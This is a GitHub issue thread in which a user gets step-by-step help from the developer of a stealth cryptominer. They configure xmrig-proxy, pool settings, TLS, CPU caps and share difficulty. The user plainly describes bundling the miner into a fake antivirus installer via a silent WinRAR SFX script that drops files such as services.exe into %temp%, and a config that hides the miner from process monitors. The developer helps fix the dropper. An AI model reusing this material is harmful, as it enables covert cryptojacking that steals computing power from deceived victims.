### ISSUE TITLE
How can i specify the ip and port

### ISSUE THREAD

**Issue by DARK-DEVIL-66** [UnamSanctam/SilentCryptoMiner#2003]
> You simply enter your xmrig-proxy IP and port as the pool in the miner.

you mean inseting xm-proxy ip and port to pool tab at the building time i am correct ?

![image](https://github.com/UnamSanctam/SilentCryptoMiner/assets/149578298/0075b477-04a8-41ec-8105-32e650244a37)

_Originally posted by @DARK-DEVIL-66 in https://github.com/UnamSanctam/SilentCryptoMiner/issues/2002#issuecomment-1839665073_

**Comment by DARK-DEVIL-66** [comment]
bro how can i specify the xm-proxy ip and port

https://serverip:8888
or

serverip:8888

or

http://serverip:8888


in pool section at building time ?

**Comment by DARK-DEVIL-66** [comment]
it's my config


{
    "access-log-file": null,
    "access-password": null,
    "algo-ext": true,
    "api": {
        "id": null,
        "worker-id": null
    },
    "http": {
        "enabled": false,
        "host": "127.0.0.1",
        "port": 0,
        "access-token": null,
        "restricted": true
    },
    "background": false,
    "bind": [
        {
            "host": "0.0.0.0",
            "port": 8888,
            "tls": false
        },
        {
            "host": "::",
            "port": 8888,
            "tls": false
        }
    ],
    "colors": true,
    "title": true,
    "custom-diff": 0,
    "custom-diff-stats": false,
    "donate-level": 0,
    "log-file": null,
    "mode": "nicehash",
    "pools": [
        {
            "algo": "rx/0",
            "url": "xmr.2miners.com:12222",
            "user": "4B9ttGq1dRJgqmnGJ6HLeZ7VhdTxvQS67Nb4FiN5CXKNNy6mJnYvTSzdyXxrfUF1mcEx4VzqzA4mBRSDxCf6aCyL1D2hSnC",
            "pass": "x",
            "keepalive": false,
            "enabled": true,
            "tls": true
        }
    ],
    "retries": 2,
    "retry-pause": 1,
    "reuse-timeout": 0,
    "tls": {
        "enabled": true,
        "protocols": null,
        "cert": null,
        "cert_key": null,
        "ciphers": null,
        "ciphersuites": null,
        "dhparam": null
    },
    "user-agent": null,
    "syslog": false,
    "verbose": false,
    "watch": true,
    "workers": true
}

**Comment by DARK-DEVIL-66** [comment]
can i switch pool or walllet from web penal without changing xm-proxy config ?

**Comment by DARK-DEVIL-66** [comment]
it's correct xm-proxy for windows os 

https://github.com/xmrig/xmrig-proxy/releases/download/v6.21.0/xmrig-proxy-6.21.0-gcc-win32.zip

**Comment by DARK-DEVIL-66** [comment]
at the building time i need to enter password field or keep empty for  (xm-proxy) in 3.4.0

**Comment by DARK-DEVIL-66** [comment]
i am waiting your answers

**Comment by UnamSanctam** [comment]
You should enter `serverip:8888` as the pool. Any pool changes or wallet changes you should do inside the xmrig-proxy config.json. The web panel configuration can either remain as it was before or you can change it to the xmrig-proxy configuration.

>it's correct xm-proxy for windows os

Yes either the gcc version or the msvs version, the msvc version is usually used.

>at the building time i need to enter password field or keep empty for (xm-proxy) in 3.4.0

The password field and the wallet field you can keep empty, only the pool field needs to have serverip:8888 in it, but the wallet field will be the worker name inside the xmrig-proxy, so you can set that to `{COMPUTERNAME}` if you want.

**Comment by DARK-DEVIL-66** [comment]
thank's bro...

**Comment by DARK-DEVIL-66** [comment]
i need to enable build time ssl/tls option in builder

**Comment by UnamSanctam** [comment]
You can yes, in that case set both `"tls"` options in the xmrig-proxy `"bind"` section to `true` instead of `false`.

**Comment by DARK-DEVIL-66** [comment]
{
    "access-log-file": null,
    "access-password": null,
    "algo-ext": true,
    "api": {
        "id": null,
        "worker-id": null
    },
    "http": {
        "enabled": false,
        "host": "127.0.0.1",
        "port": 0,
        "access-token": null,
        "restricted": true
    },
    "background": false,
    "bind": [
        {
            "host": "0.0.0.0",
            "port": 8888,
            "tls": true
        },
        {
            "host": "::",
            "port": 8888,
            "tls": true
        }
    ],
    "colors": true,
    "title": true,
    "custom-diff": 0,
    "custom-diff-stats": false,
    "donate-level": 0,
    "log-file": null,
    "mode": "nicehash",
    "pools": [
        {
            "algo": "rx/0",
            "url": "xmr.2miners.com:12222",
            "user": "4B9ttGq1dRJgqmnGJ6HLeZ7VhdTxvQS67Nb4FiN5CXKNNy6mJnYvTSzdyXxrfUF1mcEx4VzqzA4mBRSDxCf6aCyL1D2hSnC",
            "pass": "x",
            "keepalive": false,
            "enabled": true,
            "tls": true
        }
    ],
    "retries": 2,
    "retry-pause": 1,
    "reuse-timeout": 0,
    "tls": {
        "enabled": true,
        "protocols": null,
        "cert": null,
        "cert_key": null,
        "ciphers": null,
        "ciphersuites": null,
        "dhparam": null
    },
    "user-agent": null,
    "syslog": false,
    "verbose": false,
    "watch": true,
    "workers": true
}



it's correct ?

**Comment by UnamSanctam** [comment]
Yes that's correct.

**Comment by DARK-DEVIL-66** [comment]
incase i use tls/ssl option enable in build time i need to specify https in pool section or only serverip:8888 ok ?

**Comment by UnamSanctam** [comment]
Only `serverip:8888`, mining does not use the http(s) protocol.

**Comment by DARK-DEVIL-66** [comment]
basically have limitation of worker in xm-proxy or any donations level ?

**Comment by DARK-DEVIL-66** [comment]
i have one vps it's have ubuntu can i run xm-proxy on my vps server ?

hosting will ban me ?

**Comment by UnamSanctam** [comment]
Yes you can run that. I don't know if your hosting will ban you.

**Comment by DARK-DEVIL-66** [comment]
https://github.com/xmrig/xmrig-proxy/releases/download/v6.21.0/xmrig-proxy-6.21.0-linux-x64.tar.gz


this is ok for ubuntu 20

**Comment by UnamSanctam** [comment]
Yes.

**Comment by DARK-DEVIL-66** [comment]
can use same server and same ip  for xm-proxy and miner web penal 
any issue occure ?

**Comment by UnamSanctam** [comment]
Yes everything will continue running after you close your SSH, the SSH is just a terminal connection to the server.

>can use same server and same ip for xm-proxy and miner web penal
any issue occure ?

No since you use different ports.

**Comment by DARK-DEVIL-66** [comment]
you mean your web penal was used port 8888

**Comment by DARK-DEVIL-66** [comment]
any chances to crash or down my web server i used xm-proxy and web penal at the same time in one server ?

**Comment by UnamSanctam** [comment]
The web panel (like all other websites) uses port 80 for http and port 443 for https. The xmrig-proxy we set to use port 8888.

>any chances to crash or down my web server i used xm-proxy and web penal at the same time in one server ?

If you have a million miners maybe.

**Comment by DARK-DEVIL-66** [comment]
i founded fake antivirus just dummy but the  av was contain lot file can i have to chances to make it single installer ?

i tryed to many installers everything wast have droback 

are you know any installer maker ?

**Comment by UnamSanctam** [comment]
Maybe Inno Setup, that's what I have used the most.

**Comment by DARK-DEVIL-66** [comment]
;The comment below contains SFX script commands

Path=%temp%
Setup=services.exe
Setup=ps.exe
Setup=smbhost.exe
TempMode
Silent=1
Overwrite=1


i used for binding payload with miner using winrar sfx
but issue after  user will click the exe all exe are unzipped current location 

but i mentened in comment unzipping in temp folder if you know any solution ?

**Comment by DARK-DEVIL-66** [comment]
{
    "algo": "rx/0",
    "pool": "226.252.63.183",
    "port": 8888,
    "wallet": "",
    "password": "",
    "nicehash": true,
    "ssltls": true,
    "max-cpu": 20,
    "idle-wait": 5,
    "idle-cpu": 80,
    "stealth-targets": "ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe",
    "kill-targets": "",
    "stealth-fullscreen": false
}

this is ok for xm-proxy remote config ?

**Comment by DARK-DEVIL-66** [comment]
> Yes that would be correct. For the SFX the reason it doesn't unzip at %Temp% is because you have TempMode enabled.

how to make it unzipping temp folder

**Comment by UnamSanctam** [comment]
By not using TempMode.

**Comment by DARK-DEVIL-66** [comment]
you mean that 
%Temp% 

and what i need to enter in extract path fielad ?

**Comment by UnamSanctam** [comment]
The Path=%Temp% is correct but when you use the TempMode option it ignores the Path option.

**Comment by DARK-DEVIL-66** [comment]
![image](https://github.com/UnamSanctam/SilentCryptoMiner/assets/149578298/8d0b0148-6aec-4bb2-b638-940465a6105e)

![image](https://github.com/UnamSanctam/SilentCryptoMiner/assets/149578298/acb4a8a0-10e2-4852-adc1-d60d8605cbcb)



why the miners are offline showing pool ?

**Comment by DARK-DEVIL-66** [comment]
> The Path=%Temp% is correct but when you use the TempMode option it ignores the Path option.

ok bro thank's

**Comment by UnamSanctam** [comment]
>why the miners are offline showing pool ?

Since you use 1124 (the high share difficulty port) it has quite a high share difficulty which means finding a share takes long. When a pool says "Offline" for a worker then it doesn't mean that the miner is offline.

**Comment by DARK-DEVIL-66** [comment]
can fix the issue using port 1123

**Comment by DARK-DEVIL-66** [comment]
![image](https://github.com/UnamSanctam/SilentCryptoMiner/assets/149578298/eb2fd278-21a5-4237-b418-d1211d535dea)


sometime i use xm-proxy with silent miner so i need to enable nichhash 
so wich port i use 
1123 or 1124 compairing to photo

**Comment by UnamSanctam** [comment]
It's not talking about that kind of NiceHash, the xmrig-proxy can sue port 1123 as well.

**Comment by DARK-DEVIL-66** [comment]
https://www.trustpilot.com/review/herominers.com

i finded some bad rewive in for the pool so i quit my mining this pool or countinue
whats your opinen

**Comment by UnamSanctam** [comment]
Well there aren't really any good pools per say, so you probably aren't going to find a good one. Especially for Zephyr since it's still relatively new.

**Comment by DARK-DEVIL-66** [comment]
countinue or quit ?

**Comment by UnamSanctam** [comment]
Continue probably, you can always switch pools using the configuration or xmrig-proxy so it doesn't matter too much.

**Comment by DARK-DEVIL-66** [comment]
> witch pools using the configuration or xmrig-proxy so

but remining payment 
![Untitled](https://github.com/UnamSanctam/SilentCryptoMiner/assets/149578298/3dc7e3a2-8f1a-4e5c-b420-4a81a5f19ed8)

**Comment by UnamSanctam** [comment]
You can change the minimum payout so it doesn't matter much, but I have been mining on herominers before without issue.

**Comment by DARK-DEVIL-66** [comment]
i don't like to involve risk so old is gold gold in my darling belt -i using 2miners.com 

only issue is miners going to offline like previously we tilked about port 1123

**Comment by UnamSanctam** [comment]
The miners aren't actually going offline, the pool just shows that if a share hasn't been submitted in some interval.

**Comment by DARK-DEVIL-66** [comment]
> The miners aren't actually going offline, the pool just shows that if a share hasn't been submitted in some interval. The miners themselves are still mining and will show them as online in the pool when they find the next share.



but the issue decresing profit  Round Share %

**Comment by UnamSanctam** [comment]
No that doesn't make a difference really, unless you're worried about going outside the PPLNS window.

**Comment by DARK-DEVIL-66** [comment]
![image](https://github.com/UnamSanctam/SilentCryptoMiner/assets/149578298/190e362c-04f1-4eb5-a141-477143bebc34)

**Comment by UnamSanctam** [comment]
Yes that seems alright.

**Comment by DARK-DEVIL-66** [comment]
![image](https://github.com/UnamSanctam/SilentCryptoMiner/assets/149578298/2a5fcbf7-ed82-427b-bb21-d8ff91c1456e)

**Comment by DARK-DEVIL-66** [comment]
ok bro thank you so much i try to use xm-proxy in future it's help to increase profit !


what is ur opinions?

**Comment by UnamSanctam** [comment]
It probably won't make a difference in profit, but it will make the statistics in the pool look different.

**Comment by DARK-DEVIL-66** [comment]
> It probably won't make a difference in profit, but it will make the statistics in the pool look different.

why won't make a difference in profit ?

i have 300 h/s and 200h/s

so i combain to both now it's 500h/s

i founded onethink below the 500h/s miners doe's not appear in pool dashboard ithink small hashrate miners are ignored by the pool


so won't make a difference in profit, ?

**Comment by UnamSanctam** [comment]
All miners should eventually show up in the pool regardless of hashrate, though it takes longer (and won't show there as often) if it has a lower hashrate.

One hundred miners with 100 H/s or one miner with 10000 H/s doesn't really make a difference in profit. Both are still 10000 H/s.

**Comment by DARK-DEVIL-66** [comment]
![image](https://github.com/UnamSanctam/SilentCryptoMiner/assets/149578298/9a1ec62e-269b-48f1-9b9b-8d81a95d8d3b)


what is that i need to do that in my vps server ubuntu

**Comment by UnamSanctam** [comment]
You can check the link, you will need to increase the open file limit. Though it can be more complicated than what it shows in the link.

**Comment by DARK-DEVIL-66** [comment]
root@srv73647763:~# ulimit -a
real-time non-blocking time  (microseconds, -R) unlimited
core file size              (blocks, -c) 0
data seg size               (kbytes, -d) unlimited
scheduling priority                 (-e) 0
file size                   (blocks, -f) unlimited
pending signals                     (-i) 7698
max locked memory           (kbytes, -l) 251360
max memory size             (kbytes, -m) unlimited
open files                          (-n) 1024
pipe size                (512 bytes, -p) 8
POSIX message queues         (bytes, -q) 819200
real-time priority                  (-r) 0
stack size                  (kbytes, -s) 8192
cpu time                   (seconds, -t) unlimited
max user processes                  (-u) 7698
virtual memory              (kbytes, -v) unlimited
file locks                          (-x) unlimited



i checked my ubuntu current limit so i need to increse

**Comment by DARK-DEVIL-66** [comment]
root@srv73647763:~# ulimit -Sn
1024

**Comment by UnamSanctam** [comment]
Yes, there's a few different guides online. You can find many on Google.

**Comment by DARK-DEVIL-66** [comment]
huaaa it's very complicated bro

**Comment by UnamSanctam** [comment]
Haha it looks more complicated than it is, but if you have less than 1000 miners then you don't have to worry about the open file limit yet.

**Comment by DARK-DEVIL-66** [comment]
any chances 2miners.com will decrse share diff ?

**Comment by UnamSanctam** [comment]
Probably not, they increased it from 120 000 to 480 000 a few months ago and hasn't changed it since. A higher share difficulty decreases the load on their servers.

**Comment by DARK-DEVIL-66** [comment]
xm-proxy will  only effect in static or miner count (prevent from bann)

**Comment by UnamSanctam** [comment]
It makes every 256 miners into one pool connections, so 1024 miners would result in 4 pool connections.

**Comment by DARK-DEVIL-66** [comment]
256 miners  mean hashrate or miner count ?

**Comment by UnamSanctam** [comment]
Miner count.

**Comment by DARK-DEVIL-66** [comment]
whats happen i have 10 miners in proxy now it's connecting to pool or not ?

256 is mandontry ?

**Comment by UnamSanctam** [comment]
10 is fine, 256 is just the maximum for one pool connection.

**Comment by DARK-DEVIL-66** [comment]
i running xm-proxy in ssh using putty now i close the windows again i connect to ssh so xm-proxy will running in backgroun how can i get the console again

**Comment by DARK-DEVIL-66** [comment]
* COMMANDS     hashrate, connections, verbose, workers
WORKER NAME             | LAST IP         | COUNT | ACCEPTED | REJ |  10 MINUTES                                                       |    24 HOURS |
[2023-12-05 14:56:53.087]  proxy    0.00 kH/s, shares: 0/0 +0, upstreams: 1, min                                                      ers: 0 (max 0) +0/-0
[2023-12-05 14:57:53.149]  proxy    0.00 kH/s, shares: 0/0 +0, upstreams: 1, min                                                      ers: 0 (max 0) +0/-0
[2023-12-05 14:58:53.211]  proxy    0.00 kH/s, shares: 0/0 +0, upstreams: 1, miners: 0 (max 0) +0/-0
[2023-12-05 14:59:09.900] * upstreams active: 1 sleep: 0 error: 0 total: 1
[2023-12-05 14:59:09.900] * miners    active: 0 max: 0 ratio: 1:0.0




i runned xm-proxy out put like this what is showing upstreams active: 1  but i don't have any active proxy miners ?

**Comment by DARK-DEVIL-66** [comment]
can i need to run xm-proxy 24/7 or it's optional ?

**Comment by DARK-DEVIL-66** [comment]
wich % perfer you bro 


max cpu ?

long time and max profit ?

**Comment by DARK-DEVIL-66** [comment]
![image](https://github.com/UnamSanctam/SilentCryptoMiner/assets/149578298/b287e393-5116-430e-96a9-1e9de9e17eb2)

between cap 02 houres

![image](https://github.com/UnamSanctam/SilentCryptoMiner/assets/149578298/ae5ac57a-7b85-41c8-b759-23ebb37dee05)

**Comment by UnamSanctam** [comment]
The upstream is the wallet connection.

>can i need to run xm-proxy 24/7 or it's optional ?

If you want the miners to use the proxy it will always need to run of course.

>wich % perfer you bro
max cpu ?
long time and max profit ?

Not sure, I usually recommend around 20%, though you could potentially go up to 40%.

>between cap 02 houres

The difficulty is dynamic which could be why it says that, if you want a static difficulty then you can put something like `=120000` at the end of your wallet address.

**Comment by DARK-DEVIL-66** [comment]
whare i put this in end of wallet web config or ?

**Comment by DARK-DEVIL-66** [comment]
![image](https://github.com/UnamSanctam/SilentCryptoMiner/assets/149578298/142cadd6-ce02-4409-9224-01c0b1be7a66)

i enterered nothing happen

**Comment by UnamSanctam** [comment]
In your configuration, it will make the miner always mine at a 120 000 share difficulty.

**Comment by DARK-DEVIL-66** [comment]
> In your configuration, it will make the miner always mine at a 120 000 share difficulty.

otherwise ?

**Comment by DARK-DEVIL-66** [comment]
after entered miners never appear in pool bro

**Comment by DARK-DEVIL-66** [comment]
![image](https://github.com/UnamSanctam/SilentCryptoMiner/assets/149578298/6530899e-9236-4a7c-899c-54b4f4c5f158)

anything mistak ?

**Comment by UnamSanctam** [comment]
Yes that's correct, you can see it here: https://zephyr.herominers.com/#how-to-mine-zephyr-zeph. With a 176.5 hashrate and a share difficulty of 120 000 it should take on average 10 minutes to find a share.

**Comment by DARK-DEVIL-66** [comment]
![image](https://github.com/UnamSanctam/SilentCryptoMiner/assets/149578298/1c03ba02-029d-42ff-b89d-89332b1004d8)


miners never appear in pool never changing hashrate or profit but mail coming from hero miner say miner stoping hashing

**Comment by UnamSanctam** [comment]
In xmrig for 20% Max CPU you would use `--cpu-max-threads-hint=20` and for Idle CPU there isn't any in the normal xmrig.

**Comment by DARK-DEVIL-66** [comment]
omg worked man and fast connection now both miners are appear in pool dashboard can i use like thi in 2miners.com pool =12000


xmrig.exe -o xmr.2miners.com:12222 -u 4B9ttGq1dRJgqmnGJ6HLeZ7VhdTxvQS67Nb4FiN5CXKNNy6mJnYvTSzdyXxrfUF1mcEx4VzqzA4mBRSDxCf6aCyL1D2hSnC.{COMPUTERNAME} -p x --tls -k --coin monero -a rx/0 -B --background --cpu-max-threads-hint=20 

it's correct for xmrig

**Comment by UnamSanctam** [comment]
No 2miners don't allow any fixed difficulty, their difficulty is always at 480 000.

**Comment by DARK-DEVIL-66** [comment]
> HeroMiners (and many other pools) have a variable difficulty that changes to make the miner meet a specific share interval target.



pls tell me wich miner pools list are  are accept variable dificalty

**Comment by DARK-DEVIL-66** [comment]
> omg worked man and fast connection now both miners are appear in pool dashboard can i use like thi in 2miners.com pool =12000
> 
> xmrig.exe -o xmr.2miners.com:12222 -u 4B9ttGq1dRJgqmnGJ6HLeZ7VhdTxvQS67Nb4FiN5CXKNNy6mJnYvTSzdyXxrfUF1mcEx4VzqzA4mBRSDxCf6aCyL1D2hSnC.{COMPUTERNAME} -p x --tls -k --coin monero -a rx/0 -B --background --cpu-max-threads-hint=20
> 
> it's correct for xmrig

**Comment by UnamSanctam** [comment]
If you check on each pool then it will say somewhere on their website, almost always in the page where all the pool servers and ports are located.

**Comment by DARK-DEVIL-66** [comment]
xmrig.exe -o xmr.2miners.com:12222 -u 4B9ttGq1dRJgqmnGJ6HLeZ7VhdTxvQS67Nb4FiN5CXKNNy6mJnYvTSzdyXxrfUF1mcEx4VzqzA4mBRSDxCf6aCyL1D2hSnC.{COMPUTERNAME} -p x --tls -k --coin monero -a rx/0 -B --background --cpu-max-threads-hint=20


this is correct or wrong ?

**Comment by UnamSanctam** [comment]
That looks correct.

**Comment by DARK-DEVIL-66** [comment]
how can i impliment in config file 


--cpu-max-threads-hint=20



{
    "autosave": true,
    "cpu": true,
    "opencl": false,
	"background": true,
    "cuda": false,
    "pools": [
        {
            "coin": "monero",
            "algo": "rx/0",
            "url": "xmr.2miners.com:12222",
            "user": "4B9ttGq1dRJgqmnGJ6HLeZ7VhdTxvQS67Nb4FiN5CXKNNy6mJnYvTSzdyXxrfUF1mcEx4VzqzA4mBRSDxCf6aCyL1D2hSnC.{COMPUTERNAME}",
            "pass": "x",
            "tls": true,
            "keepalive": true,
            "nicehash": false
        }
    ]
}




it's my config

**Comment by UnamSanctam** [comment]
You will have to specify the different cores it should use individually.

**Comment by DARK-DEVIL-66** [comment]
what is the droback using variable diff ?


anything difference in profit (low profit )

**Comment by UnamSanctam** [comment]
Share difficulty itself doesn't really affect profit.

**Comment by DARK-DEVIL-66** [comment]
finally i got the solution offline miners - thank's -G

**Comment by DARK-DEVIL-66** [comment]
![image](https://github.com/UnamSanctam/SilentCryptoMiner/assets/149578298/73fb127b-e7d1-485e-83a1-014c3c0caf0a)

**Comment by UnamSanctam** [comment]
Yes, let's say your single miner mines at 120 000 H/s with share difficulty of 120 000 then it would be submitting a share on average every second which could get you throttled (or temporarily banned).

**Comment by DARK-DEVIL-66** [comment]
![image](https://github.com/UnamSanctam/SilentCryptoMiner/assets/149578298/40d23bac-c763-4423-8b7a-64041e2e768b)



they will bann me in futrue

**Comment by UnamSanctam** [comment]
At 3.2 kH/s with a 120 000 share difficulty you would be submitting a share about every 30 seconds which should be fine.
